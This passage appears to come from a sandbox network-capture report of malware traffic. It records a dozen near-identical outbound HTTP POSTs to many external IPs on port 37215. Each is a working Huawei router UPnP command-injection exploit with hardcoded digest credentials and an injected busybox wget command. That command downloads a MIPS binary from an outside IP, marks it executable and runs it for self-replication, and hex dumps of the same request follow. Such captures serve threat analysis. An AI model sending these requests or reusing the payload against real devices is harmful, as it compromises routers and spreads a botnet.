                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          184192.168.2.2343206197.95.37.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140201092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          185192.168.2.234694841.1.153.17837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140201092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          186192.168.2.235806641.209.144.2337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140211105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          187192.168.2.2342524180.93.177.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140213966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          188192.168.2.2335732197.103.39.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140218973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          189192.168.2.23419884.218.1.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140253067 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          190192.168.2.2351094195.32.192.6437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140259981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          191192.168.2.2344032200.50.0.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140259981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          192192.168.2.234066241.96.244.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140302896 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          193192.168.2.234290484.226.138.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.149980068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          194192.168.2.236084845.218.85.12237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.150399923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
